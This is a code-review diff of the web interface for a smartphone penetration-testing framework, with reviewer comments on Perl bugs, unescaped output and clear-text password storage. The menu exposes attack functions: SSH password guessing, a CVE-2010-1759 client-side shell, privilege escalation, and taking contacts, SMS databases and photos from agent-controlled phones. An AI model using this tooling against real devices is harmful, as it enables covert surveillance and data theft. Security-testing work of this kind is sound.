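Review bot: The password found during the test is stored in clear text: `$guessstring = "Guess: " . $guesspassword` goes into `remote.exploit` in the final `INSERT`, in a database that the shipped config accesses as `root`. Treat that value as sensitive engagement data: record only that a guess succeeded, or restrict access to the column and the database account accordingly. The file also lacks `use strict; use warnings;`, which is why the undeclared `$parm` in the `$passwordstring` assignment (presumably meant to be `$param`) evaluates to an empty string without any diagnostic.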
BIN  frameworkgui/iphone.deb
Binary file not shown
43 frameworkgui/lib/SPF.pm
@@ -0,0 +1,43 @@
+package SPF;
+use Cwd;
+
+our $SPF_DBH;
+
+sub readconfig {
+ my ($config) = @_;
+ $dir = getcwd;
+ $configfile = $dir . "/config";
+ my %Variables;
+ open(CONFIG, "<",$configfile);
+ while (<CONFIG>)
+ {
+ chomp;
+ s/#.*//;
+ s/^\s+//;
+ s/\s+$//;
+ my ($var, $value) = split(/\s*=\s*/, $_, 2);
+ $Variables{$var} = $value;
+ }
+ return %Variables;
+}
+
+sub dbconnect {
+ # short circuit returning active database handle
+ return $SPH_DBH if (ref($SPH_DBH) && $SPH_DBH->ping());
+
+ my (%Variables) = @_;
+ $sqlserver = $Variables{"MYSQLSERVER"};
+ $username = $Variables{"MYSQLUSER"};
+ $password = $Variables{"MYSQLPASS"};
+ $port = $Variables{"MYSQLPORT"};
+ $type = $Variables{"DATABASETYPE"};
+
+ if ($type eq "postgres") {
+ $SPH_DBH = DBI->connect("DBI:Pg:dbname=framework;host=$sqlserver",$username,$password) or die "Couldn't connect to database! ($DBI::errstr)";
+ } elsif ($type eq "mysql") {
+ $SPH_DBH = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password) or die "Couldn't connect to database! ($DBI::errstr)";
+ }
+ return $SPH_DBH;
+}
+
+1;
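Review bot: `readconfig` ignores the result of `open(CONFIG, "<",$configfile)`, so a missing or unreadable `config` (the path depends on `getcwd`, not on the script location) yields an empty hash, and `dbconnect` then returns undef because neither `$type` branch matches. Make both failures explicit with `open(CONFIG, "<", $configfile) or die "Couldn't open $configfile for reading! ($!)";` in `readconfig` and `else { die "Unsupported DATABASETYPE" }` in `dbconnect`. Blank and comment-only lines currently reach `split` and create an empty-key entry; `next unless length;` after the trims avoids that. The handle cache is declared as `our $SPF_DBH` but every use spells it `$SPH_DBH`; pick one name, and add `use DBI;` here rather than relying on callers to load it.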
BIN  frameworkgui/littleBulb.jpg
547 frameworkgui/menu.pl
@@ -0,0 +1,547 @@
+#!/usr/bin/perl
+BEGIN { use CGI::Carp qw(fatalsToBrowser); };
+use DBI;
+use Cwd;
+use FindBin qw($Bin);
+use lib "$Bin/lib";
+use SPF;
+my %Variables = SPF::readconfig();
+my $dbh = SPF::dbconnect(%Variables);
+$Variables{"OS"} = $^O;
+
+$sqlserver = $Variables{"MYSQLSERVER"};
+ $username = $Variables{"MYSQLUSER"};
+ $password = $Variables{"MYSQLPASS"};
+ $port = $Variables{"MYSQLPORT"};
+ $type = $Variables{"DATABASETYPE"};
+ if ($type eq "mysql")
+ {
+ if (! defined $dbh)
+ {
+ (@exec) = qw(mysqladmin -u ),$username,"-p",$port,"-h",$sqlserver,qw(create framework -p),$password;
+ system {$exec[0]} @exec;
+ $dbh = SPF::dbconnect(%Variables);
+ }
+
+ }
+ $sql = $dbh->prepare("SELECT number from agents");
+ $sql2 = $dbh->prepare("SELECT number from modems");
+
+
+print "Content-type: text/html \n\n";
+print <<"EOT";
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
+"http://www.w3.org/TR/xhtml1/DTD/transitional.dtd">
+
+<html>
+
+<head>
+ <title>SmartPhone PenTest Framework V0.1</title>
+ <meta name="author" content="Georgia Weidman" />
+
+ <link rel="stylesheet" href="styles.css" />
+
+
+
+ <script language="javascript" type="text/javascript">
+ <!--
+
+ function resetButtons()
+ {
+ document.getElementById("attach").style.display="none";
+ document.getElementById("attachRadio").style.display="block";
+ document.getElementById("sendCommand").style.display="none";
+ document.getElementById("sendCommandRadio").style.display="block";
+ document.getElementById("infoGathered").style.display="none";
+ document.getElementById("infoGatheredRadio").style.display="block";
+ document.getElementById("attachMobileModem").style.display="none";
+ document.getElementById("attachMobileModemRadio").style.display="block";
+ document.getElementById("remoteAttack").style.display="none";
+ document.getElementById("remoteAttackRadio").style.display="block";
+ document.getElementById("SEorCSAttack").style.display="none";
+ document.getElementById("SEorCSAttackRadio").style.display="block";
+ document.getElementById("database").style.display="none";
+ document.getElementById("databaseRadio").style.display="block";
+
+ }
+
+ function resetOptions()
+ {
+ document.getElementById("deliveryMethod").style.display="none";
+ document.getElementById("returnMethod").style.display="none";
+ document.getElementById("message").style.display="none";
+ document.getElementById("submitSend").style.display="none";
+ document.getElementById("submitPicture").style.display="none";
+ document.getElementById("submitContacts").style.display="none";
+ document.getElementById("submitGetDatabase").style.display="none";
+ document.getElementById("submitEscalate").style.display="none";
+ document.getElementById("recipient").style.display="none";
+ document.getElementById("modemNumber").style.display="none";
+ }
+
+
+
+ function showDiv(divName, radio)
+ {
+ resetButtons();
+ document.getElementById(divName).style.display="block";
+ document.getElementById(radio).style.display="none";
+ }
+
+ function showDiv2(divName)
+ {
+ document.getElementById(divName).style.display="block";
+ }
+
+ function hideDiv(divName)
+ {
+ document.getElementById(divName).style.display="none";
+ }
+
+
+ function confirmAndCreate()
+ {
+ var answer=confirm("This will destroy your data. Are you sure you want to do this?");
+ if (answer)
+ submitForm(1);
+ }
+ function showButton(divName)
+ {
+ document.getElementById(divName).style.display="block";
+ }
+ function submitForm(which)
+ {
+ if (which == 1)
+ document.forms["main"].action="createDatabase.pl";
+ else if (which == 2)
+ document.forms["main"].action="SEAttack.pl";
+ else if (which == 3)
+ document.forms["main"].action="CSAttack.pl";
+ else if (which == 4)
+ document.forms["main"].action="remoteAttack.pl";
+ else if (which == 5)
+ document.forms["main"].action="search.pl";
+ else if (which == 6)
+ document.forms["main"].action="attachMobileModem.pl";
+ else if (which == 7)
+ document.forms["main"].action="viewInfo.pl";
+ else if (which == 8)
+ document.forms["main"].action="sendSMS.pl";
+ else if (which == 9)
+ document.forms["main"].action="takePic.pl";
+ else if (which == 10)
+ document.forms["main"].action="getContacts.pl";
+ else if (which == 11)
+ document.forms["main"].action="getDatabase.pl";
+ else if (which == 12)
+ document.forms["main"].action="escalatePrivileges.pl";
+ else if (which == 13)
+ document.forms["main"].action="attach2Agents.pl";
+ else if (which == 14)
+ document.forms["main"].action="guessPassword.pl";
+
+ document.forms["main"].submit();
+ }
+
+ function modemNum()
+ {
+ if(document.getElementById('smsDelivery').checked || document.getElementById('smsReturn').checked)
+ showDiv2("modemNumber");
+ else hideDiv("modemNumber");
+
+ }
+
+
+
+ //-->
+ </script>
+</head>
+<body>
+<form id="main" name="main" method="post">
+<fieldset>
+ <legend><img src="bulb.jpg" height="100" width="350"></legend>
+ <br /><br />
+
+<!-- ------------Attach -------->
+
+
+<div id="attachRadio"><input type="radio" name="options" value="Attach " onClick="showDiv('attach','attachRadio')" />
+ Attach Framework to Deployed Agent
+ <br />
+</div>
+<div id="attach" name="attach" >
+
+<fieldset>
+ <legend>Attach Framework to Deployed Agent</legend>
+ <br />
+ <label for="agentPhNo">Agent Phone Number: </label> <br /> <input type=text name="agentPhNo" />
+
+ <br /><br />
+
+
+ <label for="controlPhNo">Control Phone Number: </label> <br /> <input type=text name="controlPhNo" />
+
+<div id="secondColumn" name="secondColumn">
+ <label for="agentURLPath">Agent URL Path: </label><br /><input type=text name="agentURLPath" />
+ <br /><br />
+
+ <label for="agentControlKey">Agent Control Key: </label> <br /> <input type=text name="agentControlKey" />
+ <br />
+</div>
+
+<div id="platform1" name="platform1">
+ <label for="platformDD1">Platform: </label> <br />
+ <select id="platformDD1" name="platformDD1">
+ <option value="android">Android</option>
+ <option value="iphone">iPhone</option>
+ <option value="blackberry">Blackberry</option>
+ </select>
+
+ <br />
+</div>
+
+ <br /><input type="submit" class="submitButton" name="submitAttach" id="submitAttach" value="Attach " onclick="submitForm(13);"/>
+
+<br />
+<br />
+
+
+</fieldset>
+</div>
+
+<br />
+
+<!-- ------------Send Command -------------->
+
+
+<div id="sendCommandRadio">
+ <input type="radio" name="options" value="SendCommand" onClick="showDiv('sendCommand', 'sendCommandRadio')" />
+ Send Command<br />
+</div>
+<div id="sendCommand">
+<fieldset>
+ <legend>Send Command</legend><br />
+ <label for="agentDD">Choose Agent: </label> <br />
+ <select name="agentsDD" id="agentsDD">
+
+EOT
+
+ $sql->execute;
+ while ($id=$sql->fetchrow_array())
+ {
+
+ print "<option>$id</option>";
+ }
+
+print <<"ET";
+
+ </select>
+ <br /> <br />
+
+ <input type="radio" name="options" value="sendSMS"
+ onclick="resetOptions();showDiv2('deliveryMethod');showDiv2('recipient');
+ showDiv2('message');modemNum();showButton('submitSend');" />
+ Send SMS <br />
+ <input type="radio" name="options" value="takePic" onclick="resetOptions();
+ showDiv2('deliveryMethod');modemNum(); showButton('submitPicture');" />
+ Take Picture <br />
+ <input type="radio" name="options" value="getContacts"
+ onclick="resetOptions();showDiv2('deliveryMethod');showDiv2('returnMethod');modemNum();
+ showButton('submitContacts'); " />
+ Get Contacts <br />
+ <input type="radio" name="options" value="getSMSDatabase"
+ onclick="resetOptions();showDiv2('deliveryMethod');showDiv2('returnMethod');modemNum();
+ showButton('submitGetDatabase'); " />
+ Get SMS Database <br />
+ <input type="radio" name="options" value="getSMSDatabase"
+ onclick="resetOptions();showDiv2('deliveryMethod'); modemNum();
+ showButton('submitEscalate'); " />
+ Privilege Escalation
+ <br /> <br />
+
+<div id="deliveryMethod" name="deliveryMethod">
+ <label for="deliveryMethodRB">Delivery Method: </label> <br />
+ <input type="radio" name="deliveryMethodRB" id="smsDelivery" value="SMS" onclick="modemNum();">SMS &nbsp; &nbsp;
+ <input type="radio" name="deliveryMethodRB" id="httpDelivery" value="HTTP" onclick="modemNum();">HTTP<br />
+</div>
+
+<div id="returnMethod" name="returnMethod">
+ <label for="returnMethodRB">Return Method: </label> <br />
+ <input type="radio" name="returnMethodRB" id="smsReturn" value="SMS" onclick="modemNum();">SMS &nbsp; &nbsp;
+ <input type="radio" name="returnMethodRB" id="httpReturn" value="HTTP" onclick="modemNum();">HTTP<br />
+</div>
+
+<div id="message" name="message">
+ <label for="messageTB">Message: </label> <br />
+ <textarea rows="3" cols="20" name="messageTB" id="messageTB" ></textarea>
+ <br /> <br />
+</div>
+
+<div id="recipient" name="recipient">
+ <label for="recipient">Recipient's Phone No: </label> <br /> <input type=text name="recipient" />
+ <br />
+</div>
+
+<div id="modemNumber" name="modemNumber">
+<label for="modemNoDD">Mobile Modem Number: </label> <br />
+ <select name="modemNoDD" id="modemNoDD">
+
+ET
+
+ $sql2->execute;
+ while ($no =$sql2->fetchrow_array())
+ {
+
+ print "<option>$no</option>";
+ }
+
+print <<"ET";
+
+</select>
+</div>
+ <br />
+ <input type="submit" class="submitButton" name="submitSend" id="submitSend" value="Send"
+ onclick="submitForm(8);"/>
+ <input type="submit" class="submitButton" name="submitPicture" id="submitPicture" value="Take Picture"
+ onclick="submitForm(9);"/>
+ <input type="submit" class="submitButton" name="submitContacts" id="submitContacts" value="Get Contacts"
+ onclick="submitForm(10);"/>
+ <input type="submit" class="submitButton" name="submitDatabase" id="submitGetDatabase" value="Get Database"
+ onclick="submitForm(11);"/>
+ <input type="submit" class="submitButton" name="submitEscalate" id="submitEscalate" value="Escalate"
+ onclick="submitForm(12);"/>
+</fieldset>
+</div>
+
+<br />
+
+<!-- --------------- View Info Gathered ------------------->
+
+<div id="infoGatheredRadio" name="infoGatheredRadio">
+ <input type="radio" name="options" value="infoGathered" onClick="showDiv('infoGathered', 'infoGatheredRadio')" />
+ View Information Gathered <br />
+</div>
+<div id="infoGathered" name="infoGathered">
+<fieldset>
+ <legend>View Information Gathered</legend><br />
+
+ <br /> <br />
+ <br />
+ <input type="submit" class="submitButton" name="submitView" id="submitView" value="View "
+ onclick="submitForm(7);" />
+</fieldset>
+</div>
+
+
+<br />
+
+<!-- --------------- Attach Framework to Mobile Modem ------------------->
+
+
+<div id="attachMobileModemRadio" name="attachMobileModemRadio">
+ <input type="radio" name="options" value="attachMobileModem"
+ onClick="showDiv('attachMobileModem', 'attachMobileModemRadio')" /> Attach Framework to Mobile Modem <br />
+</div>
+<div id="attachMobileModem" name="attachMobileModem">
+<fieldset>
+ <legend>Attach Framework to Mobile Modem</legend><br /> <br />
+
+ <input type="radio" name="attachFramework" value="search"
+ onclick="hideDiv('attachSmartPhone'); hideDiv('submitAttachModemAttach'); showButton('submitAttachModemSearch');" />
+ Search For Attached Modem <br /><br />
+ <input type="radio" name="attachFramework" value="attachToApp"
+ onclick="showDiv2('attachSmartPhone'); hideDiv('submitAttachModemSearch'); showButton('submitAttachModemAttach');"/>
+ Attach to SmartPhone Based App <br />
+
+<br />
+
+<div id="attachSmartPhone" name="attachSmartPhone">
+ <label for="modemPhoneNo">Phone Number: </label> <br /> <input type=text name="modemPhoneNo" />
+ <br />
+ <label for="controlKey">Control Key: </label> <br /> <input type=text name="controlKey" />
+ <br />
+
+ <label for="appURLPath">App URL Path: </label> <br /> <input type=text name="appURLPath" />
+ <br />
+
+</div>
+
+ <br />
+ <br />
+ <input type="submit" class="submitButton" name="submitAttachModemSearch" id="submitAttachModemSearch" value="Search " onclick="submitForm(5);" />
+ <input type="submit" class="submitButton" name="submitAttachModemAttach" id="submitAttachModemAttach" value="Attach " onclick="submitForm(6);"/>
+</fieldset>
+
+</div>
+
+<br />
+
+
+<!-- ---------- Remote Attack ------------>
+
+<div id="remoteAttackRadio" name="remoteAttackRadio">
+ <input type="radio" name="options" value="remoteAttack"
+ onClick="showDiv('remoteAttack', 'remoteAttackRadio');" /> Run a Remote Attack<br />
+</div>
+<div id="remoteAttack" name="remoteAttack">
+<fieldset>
+ <legend>Run a Remote Attack</legend><br /> <br />
+
+ <input type="radio" name="defaultSSHPassword" value="password"
+ onclick="showDiv2('ipAddress');showButton('submitRemoteAttack'); hideDiv('submitGuessPassword'); hideDiv('password');" />
+ Test for Default SSH password (iPhone)<br /><br />
+
+
+<input type="radio" name="defaultSSHPassword" value="guessPassword"
+ onclick="showDiv2('ipAddress'); showDiv2('password'); hideDiv('submitRemoteAttack'); showButton('submitGuessPassword');" />
+ Guess SSH password (iPhone)<br /><br />
+
+<br />
+<div id="ipAddress" name="ipAddress">
+ <label for="ipAddressTB">IP Address: </label> <br /> <input type=text name="ipAddressTB" />
+ <br />
+</div>
+
+<div id="password" name="password">
+ <label for="passwordFileTB">Password File: </label> <br /> <input type=text name="passwordFileTB" />
+ <br />
+</div>
+
+
+ <input type="submit" class="submitButton" name="submitRemoteAttack"
+ id="submitRemoteAttack" value="Attack " onclick="submitForm(4);"/>
+ <input type="submit" class="submitButton" name="submitGuessPassword"
+ id="submitGuessPassword" value="Attack " onclick="submitForm(14);"/>
+</fieldset>
+</div>
+
+
+<br />
+
+
+
+<!-- ----------------------Social Engineering or Client Side Attack ----------->
+
+<div id="SEorCSAttackRadio">
+ <input type="radio" name="options" value="SEorCSAttack"
+ onClick="showDiv('SEorCSAttack', 'SEorCSAttackRadio')" /> Run a Social Engineering or Client Side Attack<br />
+</div>
+<div id="SEorCSAttack">
+<fieldset>
+ <legend>Run a Social Engineering or Client Side Attack</legend><br /> <br />
+
+ <input type="radio" name="SEorCSAttackRB" value="downloadAgent"
+ onclick="hideDiv('shell'); hideDiv('submitCSAttack'); showDiv2('platform2'); showDiv2('hPath');
+ showDiv2('otherInfo'); showDiv2('modemNumber2');showButton('submitSEAttack');" />
+ Direct Download Agent<br /> <br />
+ <input type="radio" name="SEorCSAttackRB" value="clientSideShell"
+ onclick="hideDiv('platform2'); hideDiv('submitSEAttack'); showDiv2('shell'); showDiv2('hPath'); showDiv2('otherInfo'); showDiv2('modemNumber2'); showButton('submitCSAttack');" />
+ Client Side Shell<br /><br />
+
+
+<br />
+
+<div id="platform2" name="platform2">
+ <label for="platformDD2">Platform: </label> <br />
+ <select name="platformDD2" id="platformDD2">
+ <option value="android">Android</option>
+ <option value="iphone">iPhone</option>
+ <option value="blackberry">Blackberry</option>
+ </select>
+
+ <br />
+</div>
+
+<div id="shell" name="shell">
+ <label for="shellDD">Exploit: </label> <br />
+ <select id="exploit" name="exploit">
+ <option value="20101759">CVE-2010-1759 WebKit Vuln Android</option>
+ </select>
+
+ <br />
+</div>
+
+<div id="hPath" name="hPath">
+ <label for="hostingPath">Hosting Path: </label> <br /> <input type=text name="hostingPath" />
+
+ <br /><br />
+</div>
+
+
+<div id="otherInfo" name="otherInfo">
+ <label for="fileName">File Name: </label> <br /> <input type=text name="fileName" /> <br /><br />
+ <label for="phNo2Attack">Phone No to Attack: </label> <br /> <input type=text name="phNo2Attack" />
+ <br /> &nbsp; <br />
+</div>
+
+<div id="modemNumber2" name="modemNumber2">
+<label for="modemNoDD2">Mobile Modem Number: </label> <br />
+ <select name="modemNoDD2" id="modemNoDD2">
+
+EOT
+ET
+
+ $sql2->execute;
+ while ($no1 =$sql2->fetchrow_array())
+ {
+
+ print "<option>$no1</option>";
+ }
+
+print <<"ET";
+
+</select>
+</div>
+
+
+ <input type="submit" class="submitButton" name="submitSEAttack" id="submitSEAttack"
+ value="Attack " onclick="submitForm(2);" />
+ <input type="submit" class="submitButton" name="submitCSAttack" id="submitCSAttack"
+ value="Attack " onclick="submitForm(3);" />
+<br /><br /><br />
+</fieldset>
+</div>
+
+<br />
+
+<!-- ---------------------- Clear/Create Database ----------->
+
+
+
+<div id="databaseRadio" name="databaseRadio">
+ <input type="radio" name="options" value="Database" onClick="showDiv('database', 'databaseRadio');" >
+ Clear/Create Database<br />
+</div>
+<div id="database">
+
+<fieldset>
+ <legend>Clear/Create Database</legend><br /> <br />
+
+
+<br />
+
+
+ <input type="button" class="submitButton" name="submitDatabase" id="submitDatabase" value="Clear/Create "
+ onclick="confirmAndCreate();" />
+
+
+
+</fieldset>
+
+</div>
+
+
+<br />
+<!-- -->
+
+
+
+
+
+</fieldset>
+</form>
+</body>
+</html>
+
+ET
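Review bot: The three option loops (`print "<option>$id</option>"`, and the same for `$no` and `$no1`) write `agents.number` and `modems.number` into the page without HTML escaping, and those columns appear to be filled from free-text inputs such as `agentPhNo` and `modemPhoneNo`, so markup stored in them would run in the operator's browser. Escape at output, e.g. add `use CGI ();` and write `print "<option>" . CGI::escapeHTML($id) . "</option>";`. The stray `EOT` line just before the last-but-one `ET` terminator is still inside the `<<"ET"` heredoc and is printed literally into the `modemNoDD2` select. In the `mysqladmin` fallback, `(@exec) = qw(mysqladmin -u ),$username,...` assigns only the `qw` list because `=` binds tighter than the comma; parenthesise the whole list, and avoid passing the password as a command-line argument where it shows up in the process list.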
97 frameworkgui/myJavaScript.js
@@ -0,0 +1,97 @@
+
+
+ function resetButtons()
+ {
+ document.getElementById("attach").style.display="none";
+ document.getElementById("attachRadio").style.display="block";
+ document.getElementById("sendCommand").style.display="none";
+ document.getElementById("sendCommandRadio").style.display="block";
+ document.getElementById("infoGathered").style.display="none";
+ document.getElementById("infoGatheredRadio").style.display="block";
+ document.getElementById("attachMobileModem").style.display="none";
+ document.getElementById("attachMobileModemRadio").style.display="block";
+ document.getElementById("remoteAttack").style.display="none";
+ document.getElementById("remoteAttackRadio").style.display="block";
+ document.getElementById("SEorCSAttack").style.display="none";
+ document.getElementById("SEorCSAttackRadio").style.display="block";
+ document.getElementById("database").style.display="none";
+ document.getElementById("databaseRadio").style.display="block";
+
+ }
+
+ function resetOptions()
+ {
+ document.getElementById("deliveryMethod").style.display="none";
+ document.getElementById("returnMethod").style.display="none";
+ document.getElementById("message").style.display="none";
+ document.getElementById("submitSend").style.display="none";
+ document.getElementById("submitPicture").style.display="none";
+ document.getElementById("submitContacts").style.display="none";
+ document.getElementById("submitGetDatabase").style.display="none";
+ document.getElementById("submitEscalate").style.display="none";
+ document.getElementById("recipient").style.display="none";
+ }
+
+
+
+ function showDiv(divName, radio)
+ {
+ resetButtons();
+ document.getElementById(divName).style.display="block";
+ document.getElementById(radio).style.display="none";
+ }
+
+ function showDiv2(divName)
+ {
+ document.getElementById(divName).style.display="block";
+ }
+
+ function hideDiv(divName)
+ {
+ document.getElementById(divName).style.display="none";
+ }
+
+
+ function confirmAndCreate()
+ {
+ var answer=confirm("This will destroy your data. Are you sure you want to do this?");
+ if (answer)
+ submitForm(1);
+ }
+ function showButton(divName)
+ {
+ document.getElementById(divName).style.display="block";
+ }
+ function submitForm(which)
+ {
+ if (which == 1)
+ document.forms["main"].action="createDatabase.pl";
+ else if (which == 2)
+ document.forms["main"].action="SEAttack.pl";
+ else if (which == 3)
+ document.forms["main"].action="CSAttack.pl";
+ else if (which == 4)
+ document.forms["main"].action="remoteAttack.pl";
+ else if (which == 5)
+ document.forms["main"].action="search.pl";
+ else if (which == 6)
+ document.forms["main"].action="attachMobileModem.pl";
+ else if (which == 7)
+ document.forms["main"].action="viewInfo.pl";
+ else if (which == 8)
+ document.forms["main"].action="sendSMS.pl";
+ else if (which == 9)
+